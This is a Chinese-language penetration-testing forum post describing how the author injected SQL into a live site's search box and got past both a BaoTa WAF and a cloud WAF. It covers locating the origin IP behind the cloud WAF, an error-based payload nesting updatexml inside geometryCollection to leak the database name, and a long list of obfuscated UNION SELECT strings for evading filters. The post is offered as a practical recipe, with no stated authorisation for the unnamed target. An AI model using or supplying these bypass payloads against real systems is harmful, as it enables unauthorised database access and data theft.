问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
记一次SQL注入绕过宝塔+云waf
渗透测试
话不多说,上干货
**0x01 多重waf绕过** ---------------- 注入点搜索框 ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-e06a90a6f6a06aa706eb7b04bafd9e56ac78385d.png) 单双引号进行测试 看看是字符型的还是数字型的,发现是字符型![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-230da0627e1c9b15dea7d7a1ef13f5ca3d419d4e.png) ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-277008c76c4e4188513b3d4917df2f9e30376f86.png) 准备上语句发现有宝塔waf+云waf ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-a5c0d126d6fe88f28639139be6dc5769eb4da5b5.png) ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-03e900b162c307996186b3e3399373fe125ebc89.png) **0x02 过云waf** 首先看看有无cdn节点 ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-baebab6591dfa0d04771e81c2f09615fe32bfbf1.png) 全球ping ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-dac37e6e9a8862598777d424978469fe502358c1.png) 发现这两个没有回应真实ip,就去看看用fofa或者hunter来在真实ip,hunter上面显示183是云厂商肯定是云waf,不能用这个ip ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-d93781844d65e00c7dbc7fbb6907e45d6611b4aa.png) 之后在看fofa上面能不能找到真实ip ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-8b827a4021e2f1126542a1d3979dcdbe88e6b619.png)发现这个ip跟历史解析记录是同一个c段的 ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-d590fa4440427a30e5af00378b65c50ac66925a0.png) 然后用拦截云waf的语句来试试,发现无云waf显示 ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-df39918fe0de2363c75f281484f0f79bf8a8c2fa.png) ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-b589fa9d3b5f49a9b36575a23ff6efbbfedb88bd.png) **找云waf的几种方式** `1. 通过全球ping``2. 找历史解析记录``3. 通过fofa或者hunter空间引擎来搜索``4. 通过历史解析记录扫c段` **0x03 过宝塔waf** --------------- **1.报错注入** ---------- 首先判断出字符型的话,就得去测试’||||’ ‘or+or’的语句,但是我发现他这里只要是在两个or之间出现东西,就一定会触发宝塔waf ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-7616169d3309922f6b855644f58cfc193aa5c0bc.png) 当时试了很多思路,发现可以’;%00方法,还有可以加--+注释符的,但是尝试之后只有--+可以正常回显 ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-6878f9ac27cd2e11aff07797c91849015754c329.png) ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-7f1d889ca313f7083c22beae315b48c12d85c940.png) 其实这里最初的思路根本不是什么’||||’,这里是按照1’||1=1来测试 ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-85bc9e465d94cf386d6a054bf4e1b92a68dd6ceb.png) 然后尝试想把1=1,后面这个1能不能换成报错函数之类的,发现直接被拦 ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-cd92e96547338567e339d0b1f5d8f67b8df82f7e.png) 所以我猜测这个是不是有可能把mysql所有的报错函数都给拦了一下,尝试其他的报错函数看看 exp ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-82166e9e9d54a217f6bf216101ecb9ffa210e57b.png) floor ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-4c3bb56698094dcfde0d53ad22ceae1b43fdfbdb.png) `例如:``Polygon,GeometryCollection,MultiPoint,MultiLineString``我发现这几个都没有过滤,可能就过滤了平常可见的报错函数` ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-02850e964912fced0d5ca9e11ea88616e4af1ba5.png) 既然这函数可以用,那我们就开始构造语句试试,正常的语句用不了,那我们就玩点不正常的 ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-49372ecb6ef0e358797ac703d216e345c74ba020.png) 看看这函数怎么搞的,把里面的语句替换成1,看看哪里出了问题,发包,发现他这个1直接爆出来了 ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-496c86e8e2ebe9a5b0a17abf540cee41204a6516.png) 尝试能不能select database()这样,把库名搞出来 ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-94a039f6c8246b856720be3d633facc73ec40035.png) 发现还是不行 可能是因为database()后面跟着--没有闭合的原因,加个||’来试试能不能闭合 ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-901ef9dd498a571501cc760c55c37363929f25bb.png) emmm,还是不行 既然select database()不行,那就试试再套一层报错函数,看看能不能行 `Pyload:1'||1=geometryCollection(updatexml(1,concat(0x7e,database(),0x7e),1))--+` 发包 ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-c1e3a167a6e228413100c4cc6fba3cdde27c8812.png) 哟西,果然能行,出库名了,成功绕过waf **2.联合注入** ---------- 直接'ordre by xx --+ 正常判断出库名,17正常 18报错 ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-7b4ba6f596c105df45243c9ba5a6037d155b105b.png) ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-5b9ef7eea1cd60f6a644b5abe61c24c6bed7d5a2.png) 然后fuzz union select 函数,尝试太多截图就不放了,直接快进到最后一步 ```php /*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f**%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/**/ /**//*!union*//**//*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ +UnIOn%0d%0aSeleCt%0d%0a UNION/*&test=1*/SELECT/*&pwn=2*/ un?+un/**/ion+se/**/lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f%252a /select%252f%252a*/ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f**%2funion%2f**%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A /*!UnIoN*/SeLecT+ %55nion(%53elect) union%20distinct%20select union%20%64istinctRO%57%20select union%2053elect %23?%0auion%20?%23?%0aselect %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect %55nion %53eLEct u%6eion se%6cect unio%6e %73elect unio%6e%20%64istinc%74%20%73elect uni%6fn distinct%52OW s%65lect ``` Pyload: `union+distinctROW+select` ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-7a6635aa3331cc1c92bf9cfe5c2aee4969e5d264.png) 开始构造,pyload如图,发包 ![](https://shs3.b.qianxin.com/attack_forum/2023/12/attach-eb48a58e8562d2cf9923a783b153ed2880b995a1.png) 成功绕过
发表于 2023-12-27 09:00:01
阅读 ( 8243 )
分类:
渗透测试
9 推荐
收藏
1 条评论
芝士麻薯KA
2024-02-02 18:25
干货满满,NB啊师傅,学习到了~
请先
登录
后评论
请先
登录
后评论
陌离sg009
3 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!